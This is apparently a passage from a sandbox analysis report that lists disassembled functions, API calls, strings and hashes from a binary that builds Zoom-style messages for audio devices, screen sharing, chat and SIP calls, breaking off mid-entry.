                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$H_prolog3MessagePackageTree@$Cmm@@@CriticalEnterH000@H00@H_prolog3_Node@23@Root@SectionTemplate_2@Template_3@TreeV12@@
                • String ID: TroubleReason$TroubleTime$TroubleType$com.zoom.app.assistant.upload.exception.memory.log.request
                • API String ID: 3310136194-2024543588
                • Opcode ID: 9f681de1cf728dff8c2f836cafbc457e5da19c37f121e6001e1f96dd516286e7
                • Instruction ID: 19e297fe954ca281a02189b07ba15a50b555b5b6822a827e6b5fe2a09b5ba205
                • Opcode Fuzzy Hash: 9f681de1cf728dff8c2f836cafbc457e5da19c37f121e6001e1f96dd516286e7
                • Instruction Fuzzy Hash: 0DF06D70A40394BFD7107B545C5AB2A76A8E760F6DF5085A8F2456B3D1CBF08808CB75
                Function 00C6EB00 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 27windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6EB07
                • ??0?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@IV12@@Archive@Cmm@@QAE@PBDH000@Z.RWSNDPQSKZ(com.zoom.app.assistant.virtualaudio.message.unset.selected.device.request,00009DD8,deviceID,deviceType,channelName,00000004), ref: 00C6EB2C
                  • Part of subcall function 00C8C490: __EH_prolog3.LIBCMT ref: 00C8C497
                  • Part of subcall function 00C8C490: ??0?$CmmMessageTemplate_2@V?$CStringT@D@Cmm@@I@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(?,?,?,?,00000004,00C8C3F5,?,?,?,?,?,00000004,00C6C4A4,com.Zoom.app.pt.mediaapi.response,0000274A,requestID), ref: 00C8C4AD
                  • Part of subcall function 00C8EC56: __EH_prolog3_GS.LIBCMT ref: 00C8EC5D
                  • Part of subcall function 00C8EC56: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000050,00C6EB61,com.zoom.app.assistant.virtualaudio.message.unset.selected.device.request,deviceID,deviceType,channelName,com.zoom.app.assistant.virtualaudio.message.unset.selected.device.request,00009DD8,deviceID,deviceType,channelName,00000004), ref: 00C8EC89
                  • Part of subcall function 00C8EC56: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000050,00C6EB61,com.zoom.app.assistant.virtualaudio.message.unset.selected.device.request,deviceID,deviceType,channelName,com.zoom.app.assistant.virtualaudio.message.unset.selected.device.request,00009DD8,deviceID,deviceType,channelName,00000004), ref: 00C8ECB7
                  • Part of subcall function 00C8EC56: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,00000050,00C6EB61,com.zoom.app.assistant.virtualaudio.message.unset.selected.device.request,deviceID,deviceType,channelName,com.zoom.app.assistant.virtualaudio.message.unset.selected.device.request,00009DD8,deviceID,deviceType,channelName,00000004), ref: 00C8ECF4
                  • Part of subcall function 00C8EC56: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,00000050,00C6EB61,com.zoom.app.assistant.virtualaudio.message.unset.selected.device.request,deviceID,deviceType,channelName,com.zoom.app.assistant.virtualaudio.message.unset.selected.device.request,00009DD8,deviceID,deviceType,channelName), ref: 00C8ED24
                  • Part of subcall function 00C8EC56: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,-00000004,?,00000050,00C6EB61,com.zoom.app.assistant.virtualaudio.message.unset.selected.device.request,deviceID,deviceType,channelName,com.zoom.app.assistant.virtualaudio.message.unset.selected.device.request,00009DD8,deviceID), ref: 00C8ED90
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$H_prolog3MessagePackageTree@$CriticalEnterH000@H00@H_prolog3_Node@23@Root@SectionTemplate_2@Template_3@TreeV12@@
                • String ID: channelName$com.zoom.app.assistant.virtualaudio.message.unset.selected.device.request$deviceID$deviceType
                • API String ID: 2211999291-3402303056
                • Opcode ID: 0f2f90cb303c652d6454a1cd9ed7268b642088e4ea46d9e03ae94ba8f038de14
                • Instruction ID: 80f2777e891a9061357132765c78511fd65ad9160497aeea7c4fe107afbd194e
                • Opcode Fuzzy Hash: 0f2f90cb303c652d6454a1cd9ed7268b642088e4ea46d9e03ae94ba8f038de14
                • Instruction Fuzzy Hash: FDF030F1A402A4BFD7107B584847B2A3598A790B9AF044559B1105A3D2CBF54848977D
                Function 00C70CC0 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 27windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C70CC7
                • ??0?$CmmMessageTemplate_3@HHH@Archive@Cmm@@QAE@PBDH000@Z.RWSNDPQSKZ(com.Zoom.app.conf.operate.video.facility,0000277B,FromApp,OperateType,NeedUserConfirm,00000004), ref: 00C70CEC
                  • Part of subcall function 00C8A780: __EH_prolog3.LIBCMT ref: 00C8A787
                  • Part of subcall function 00C8A780: ??0?$CmmMessageTemplate_2@HH@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(?,?,?,?,00000004,00C8A6A5,?,?,?,?,?,00000004,00C7CD68,?,?,?), ref: 00C8A79D
                  • Part of subcall function 00C915F2: __EH_prolog3_GS.LIBCMT ref: 00C915F9
                  • Part of subcall function 00C915F2: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000050,00C70D21,com.Zoom.app.conf.operate.video.facility,FromApp,OperateType,NeedUserConfirm,com.Zoom.app.conf.operate.video.facility,0000277B,FromApp,OperateType,NeedUserConfirm,00000004), ref: 00C91625
                  • Part of subcall function 00C915F2: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000050,00C70D21,com.Zoom.app.conf.operate.video.facility,FromApp,OperateType,NeedUserConfirm,com.Zoom.app.conf.operate.video.facility,0000277B,FromApp,OperateType,NeedUserConfirm,00000004), ref: 00C91653
                  • Part of subcall function 00C915F2: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,00000050,00C70D21,com.Zoom.app.conf.operate.video.facility,FromApp,OperateType,NeedUserConfirm,com.Zoom.app.conf.operate.video.facility,0000277B,FromApp,OperateType,NeedUserConfirm,00000004), ref: 00C91690
                  • Part of subcall function 00C915F2: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,00000050,00C70D21,com.Zoom.app.conf.operate.video.facility,FromApp,OperateType,NeedUserConfirm,com.Zoom.app.conf.operate.video.facility,0000277B,FromApp,OperateType,NeedUserConfirm), ref: 00C916C0
                  • Part of subcall function 00C915F2: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,-00000004,?,00000050,00C70D21,com.Zoom.app.conf.operate.video.facility,FromApp,OperateType,NeedUserConfirm,com.Zoom.app.conf.operate.video.facility,0000277B,FromApp), ref: 00C9172C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@$Archive$H_prolog3MessagePackageStringTree@$CriticalEnterH000@H00@H_prolog3_Node@23@Root@SectionTemplate_2@Template_3@Tree
                • String ID: FromApp$NeedUserConfirm$OperateType$com.Zoom.app.conf.operate.video.facility
                • API String ID: 2610200052-1513063174
                • Opcode ID: b4241be7793d69e56d3e04be4088f4137035923f2ac15c65695501a5ae2c2210
                • Instruction ID: 83fba9da464da8d3c44d051740b502f9273b9cf09e3276f501f84b0dc00b9e85
                • Opcode Fuzzy Hash: b4241be7793d69e56d3e04be4088f4137035923f2ac15c65695501a5ae2c2210
                • Instruction Fuzzy Hash: 03F02B71A403A4BBE710FB849C46F1A3264E790B1DF00C929F2416A3C1CBF44D05E338
                Function 00C70DD0 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 27windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C70DD7
                • ??0?$CmmMessageTemplate_3@HHH@Archive@Cmm@@QAE@PBDH000@Z.RWSNDPQSKZ(com.Zoom.app.conf.operate.screenshare.facility,0000277C,FromApp,OperateType,NeedUserConfirm,00000004), ref: 00C70DFC
                  • Part of subcall function 00C8A780: __EH_prolog3.LIBCMT ref: 00C8A787
                  • Part of subcall function 00C8A780: ??0?$CmmMessageTemplate_2@HH@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(?,?,?,?,00000004,00C8A6A5,?,?,?,?,?,00000004,00C7CD68,?,?,?), ref: 00C8A79D
                  • Part of subcall function 00C915F2: __EH_prolog3_GS.LIBCMT ref: 00C915F9
                  • Part of subcall function 00C915F2: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000050,00C70D21,com.Zoom.app.conf.operate.video.facility,FromApp,OperateType,NeedUserConfirm,com.Zoom.app.conf.operate.video.facility,0000277B,FromApp,OperateType,NeedUserConfirm,00000004), ref: 00C91625
                  • Part of subcall function 00C915F2: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000050,00C70D21,com.Zoom.app.conf.operate.video.facility,FromApp,OperateType,NeedUserConfirm,com.Zoom.app.conf.operate.video.facility,0000277B,FromApp,OperateType,NeedUserConfirm,00000004), ref: 00C91653
                  • Part of subcall function 00C915F2: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,00000050,00C70D21,com.Zoom.app.conf.operate.video.facility,FromApp,OperateType,NeedUserConfirm,com.Zoom.app.conf.operate.video.facility,0000277B,FromApp,OperateType,NeedUserConfirm,00000004), ref: 00C91690
                  • Part of subcall function 00C915F2: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,00000050,00C70D21,com.Zoom.app.conf.operate.video.facility,FromApp,OperateType,NeedUserConfirm,com.Zoom.app.conf.operate.video.facility,0000277B,FromApp,OperateType,NeedUserConfirm), ref: 00C916C0
                  • Part of subcall function 00C915F2: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,-00000004,?,00000050,00C70D21,com.Zoom.app.conf.operate.video.facility,FromApp,OperateType,NeedUserConfirm,com.Zoom.app.conf.operate.video.facility,0000277B,FromApp), ref: 00C9172C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@$Archive$H_prolog3MessagePackageStringTree@$CriticalEnterH000@H00@H_prolog3_Node@23@Root@SectionTemplate_2@Template_3@Tree
                • String ID: FromApp$NeedUserConfirm$OperateType$com.Zoom.app.conf.operate.screenshare.facility
                • API String ID: 2610200052-649132001
                • Opcode ID: dfa609529f41f6cf510d411d700c9f0bebed852023ec2471bea185e041d849f8
                • Instruction ID: 6d15da8b8204addf69478bc91f33125dd71cb2435e4a6540863fdc7852b33a4d
                • Opcode Fuzzy Hash: dfa609529f41f6cf510d411d700c9f0bebed852023ec2471bea185e041d849f8
                • Instruction Fuzzy Hash: ADF022B0640395BFD720BB054C46B2E6674EB54B09F90C92DB2806A3D2CBF48D04E774
                Function 00C68DF0 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 27windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C68DF7
                • ??0?$CmmMessageTemplate_3@III@Archive@Cmm@@QAE@PBDH000@Z.RWSNDPQSKZ(com.Zoom.app.conf.notifyStartSetting,00002721,Param,Tab,SubTab,00000004), ref: 00C68E1C
                  • Part of subcall function 00C86EE0: __EH_prolog3.LIBCMT ref: 00C86EE7
                  • Part of subcall function 00C86EE0: ??0?$CmmMessageTemplate_2@II@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(?,?,?,?,00000004,00C68E21,com.Zoom.app.conf.notifyStartSetting,00002721,Param,Tab,SubTab,00000004), ref: 00C86EFD
                  • Part of subcall function 00C86F8D: __EH_prolog3_GS.LIBCMT ref: 00C86F94
                  • Part of subcall function 00C86F8D: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000050,00C68E51,com.Zoom.app.conf.notifyStartSetting,Param,Tab,SubTab,com.Zoom.app.conf.notifyStartSetting,00002721,Param,Tab,SubTab,00000004), ref: 00C86FC0
                  • Part of subcall function 00C86F8D: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000050,00C68E51,com.Zoom.app.conf.notifyStartSetting,Param,Tab,SubTab,com.Zoom.app.conf.notifyStartSetting,00002721,Param,Tab,SubTab,00000004), ref: 00C86FEE
                  • Part of subcall function 00C86F8D: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,00000050,00C68E51,com.Zoom.app.conf.notifyStartSetting,Param,Tab,SubTab,com.Zoom.app.conf.notifyStartSetting,00002721,Param,Tab,SubTab,00000004), ref: 00C8702B
                  • Part of subcall function 00C86F8D: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,00000050,00C68E51,com.Zoom.app.conf.notifyStartSetting,Param,Tab,SubTab,com.Zoom.app.conf.notifyStartSetting,00002721,Param,Tab,SubTab), ref: 00C8705B
                  • Part of subcall function 00C86F8D: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,-00000004,?,00000050,00C68E51,com.Zoom.app.conf.notifyStartSetting,Param,Tab,SubTab,com.Zoom.app.conf.notifyStartSetting,00002721,Param), ref: 00C870C7
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@$Archive$H_prolog3MessagePackageStringTree@$CriticalEnterH000@H00@H_prolog3_Node@23@Root@SectionTemplate_2@Template_3@Tree
                • String ID: Param$SubTab$Tab$com.Zoom.app.conf.notifyStartSetting
                • API String ID: 2610200052-2151668039
                • Opcode ID: a9802d35e0cc301a777c30c52da14a0f685508511a58ed76d18fee47d01ffa28
                • Instruction ID: df4b61b5e0204a41be348152187e514c84fecc15a4303f06da812c9abb458371
                • Opcode Fuzzy Hash: a9802d35e0cc301a777c30c52da14a0f685508511a58ed76d18fee47d01ffa28
                • Instruction Fuzzy Hash: 3DF065F0640750EFE7106B85AC86B1AB658FB50B59F900568B2145E3C1CBF14948C775
                Function 00C74D90 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 27windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C74D97
                • ??0?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@V12@V12@@Archive@Cmm@@QAE@PBDH000@Z.RWSNDPQSKZ(com.zoom.app.make.call.log.info,000027BA,log,enc_list,enc_type_list,00000004), ref: 00C74DBC
                  • Part of subcall function 00C88CE0: __EH_prolog3.LIBCMT ref: 00C88CE7
                  • Part of subcall function 00C88CE0: ??0?$CmmMessageTemplate_2@V?$CStringT@D@Cmm@@V12@@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(?,?,?,?,00000004,00C6A291,com.zoom.app.UpdateFeatureToggle,000027DB,Name,Service,Value,00000004), ref: 00C88CFD
                  • Part of subcall function 00C88F0D: __EH_prolog3_GS.LIBCMT ref: 00C88F14
                  • Part of subcall function 00C88F0D: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000050,00C6A2C1,com.zoom.app.UpdateFeatureToggle,Name,Service,Value,com.zoom.app.UpdateFeatureToggle,000027DB,Name,Service,Value,00000004), ref: 00C88F40
                  • Part of subcall function 00C88F0D: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000050,00C6A2C1,com.zoom.app.UpdateFeatureToggle,Name,Service,Value,com.zoom.app.UpdateFeatureToggle,000027DB,Name,Service,Value,00000004), ref: 00C88F6E
                  • Part of subcall function 00C88F0D: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,00000050,00C6A2C1,com.zoom.app.UpdateFeatureToggle,Name,Service,Value,com.zoom.app.UpdateFeatureToggle,000027DB,Name,Service,Value,00000004), ref: 00C88FAB
                  • Part of subcall function 00C88F0D: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,00000050,00C6A2C1,com.zoom.app.UpdateFeatureToggle,Name,Service,Value,com.zoom.app.UpdateFeatureToggle,000027DB,Name,Service,Value), ref: 00C88FDB
                  • Part of subcall function 00C88F0D: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,-00000004,?,00000050,00C6A2C1,com.zoom.app.UpdateFeatureToggle,Name,Service,Value,com.zoom.app.UpdateFeatureToggle,000027DB,Name), ref: 00C89047
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$H_prolog3MessagePackageTree@V12@@$CriticalEnterH000@H00@H_prolog3_Node@23@Root@SectionTemplate_2@Template_3@TreeV12@
                • String ID: com.zoom.app.make.call.log.info$enc_list$enc_type_list$log
                • API String ID: 491978956-2685834041
                • Opcode ID: bcf0399bb8d98f56565e63128376e84531a5cd4af14e30382e654fbbca6f05ff
                • Instruction ID: fcbd80cc822694eaf3f9a5b23a7d85ac923bcdeb1042ce9074b83d61c69d4154
                • Opcode Fuzzy Hash: bcf0399bb8d98f56565e63128376e84531a5cd4af14e30382e654fbbca6f05ff
                • Instruction Fuzzy Hash: F6F030B06447506BD3206B949C4AB6E2164F754F59F940A28B6645A381CBF00A08E774
                Function 00C6CDA0 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 27windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6CDA7
                • ??0?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@HV12@@Archive@Cmm@@QAE@PBDH000@Z.RWSNDPQSKZ(com.zoom.app.assistant.sip.callOperationFail.notification,00009CBE,CallID,FailReason,CodeDetail,00000004), ref: 00C6CDCC
                  • Part of subcall function 00C8D020: __EH_prolog3.LIBCMT ref: 00C8D027
                  • Part of subcall function 00C8D020: ??0?$CmmMessageTemplate_2@V?$CStringT@D@Cmm@@H@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(?,?,?,?,00000004,00C6CDD1,com.zoom.app.assistant.sip.callOperationFail.notification,00009CBE,CallID,FailReason,CodeDetail,00000004), ref: 00C8D03D
                  • Part of subcall function 00C8D100: __EH_prolog3_GS.LIBCMT ref: 00C8D107
                  • Part of subcall function 00C8D100: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000050,00C6CE01,com.zoom.app.assistant.sip.callOperationFail.notification,CallID,FailReason,CodeDetail,com.zoom.app.assistant.sip.callOperationFail.notification,00009CBE,CallID,FailReason,CodeDetail,00000004), ref: 00C8D133
                  • Part of subcall function 00C8D100: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000050,00C6CE01,com.zoom.app.assistant.sip.callOperationFail.notification,CallID,FailReason,CodeDetail,com.zoom.app.assistant.sip.callOperationFail.notification,00009CBE,CallID,FailReason,CodeDetail,00000004), ref: 00C8D161
                  • Part of subcall function 00C8D100: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,00000050,00C6CE01,com.zoom.app.assistant.sip.callOperationFail.notification,CallID,FailReason,CodeDetail,com.zoom.app.assistant.sip.callOperationFail.notification,00009CBE,CallID,FailReason,CodeDetail,00000004), ref: 00C8D19E
                  • Part of subcall function 00C8D100: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,00000050,00C6CE01,com.zoom.app.assistant.sip.callOperationFail.notification,CallID,FailReason,CodeDetail,com.zoom.app.assistant.sip.callOperationFail.notification,00009CBE,CallID,FailReason,CodeDetail), ref: 00C8D1CE
                  • Part of subcall function 00C8D100: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,-00000004,?,00000050,00C6CE01,com.zoom.app.assistant.sip.callOperationFail.notification,CallID,FailReason,CodeDetail,com.zoom.app.assistant.sip.callOperationFail.notification,00009CBE,CallID), ref: 00C8D23A
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$H_prolog3MessagePackageTree@$CriticalEnterH000@H00@H_prolog3_Node@23@Root@SectionTemplate_2@Template_3@TreeV12@@
                • String ID: CallID$CodeDetail$FailReason$com.zoom.app.assistant.sip.callOperationFail.notification
                • API String ID: 2211999291-236660474
                • Opcode ID: 99fedbe3e6becf81c3a6b91c3c21ce527c144fd2c077a09ec88edd66cfaa5dca
                • Instruction ID: a73f8a947dedce3648f866388e58164552400bd4d8278f6e0c958acef0131f75
                • Opcode Fuzzy Hash: 99fedbe3e6becf81c3a6b91c3c21ce527c144fd2c077a09ec88edd66cfaa5dca
                • Instruction Fuzzy Hash: 54F0EDB0F44390BAE7107B848C57F2E66A8EB50F99F608028B1406A3C2CBF54C04D7B4
                Function 00C70E40 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 27windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C70E47
                • ??0?$CmmMessageTemplate_3@HHH@Archive@Cmm@@QAE@PBDH000@Z.RWSNDPQSKZ(com.Zoom.app.conf.operate.chat.facility,0000277D,FromApp,OperateType,NeedUserConfirm,00000004), ref: 00C70E6C
                  • Part of subcall function 00C8A780: __EH_prolog3.LIBCMT ref: 00C8A787
                  • Part of subcall function 00C8A780: ??0?$CmmMessageTemplate_2@HH@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(?,?,?,?,00000004,00C8A6A5,?,?,?,?,?,00000004,00C7CD68,?,?,?), ref: 00C8A79D
                  • Part of subcall function 00C915F2: __EH_prolog3_GS.LIBCMT ref: 00C915F9
                  • Part of subcall function 00C915F2: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000050,00C70D21,com.Zoom.app.conf.operate.video.facility,FromApp,OperateType,NeedUserConfirm,com.Zoom.app.conf.operate.video.facility,0000277B,FromApp,OperateType,NeedUserConfirm,00000004), ref: 00C91625
                  • Part of subcall function 00C915F2: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000050,00C70D21,com.Zoom.app.conf.operate.video.facility,FromApp,OperateType,NeedUserConfirm,com.Zoom.app.conf.operate.video.facility,0000277B,FromApp,OperateType,NeedUserConfirm,00000004), ref: 00C91653
